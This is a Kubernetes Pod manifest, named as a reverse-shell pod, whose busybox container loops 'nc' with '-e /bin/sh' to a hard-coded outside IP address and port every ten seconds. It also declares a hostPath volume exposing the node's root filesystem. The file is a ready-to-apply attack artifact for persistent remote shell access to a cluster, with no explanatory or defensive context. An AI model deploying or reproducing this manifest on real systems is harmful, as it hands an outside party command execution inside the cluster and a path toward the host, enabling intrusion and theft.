apiVersion: v1
kind: Pod
metadata:
  name: nc-reverse-shell-pod
  labels:
    app: nc
spec:
  containers:
  - name: nc-reverse-shell
    image: busybox
    args: ["sh", "-c", "while true; do nc 68.183.22.232 4641 -e /bin/sh; sleep 10; done"]
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory
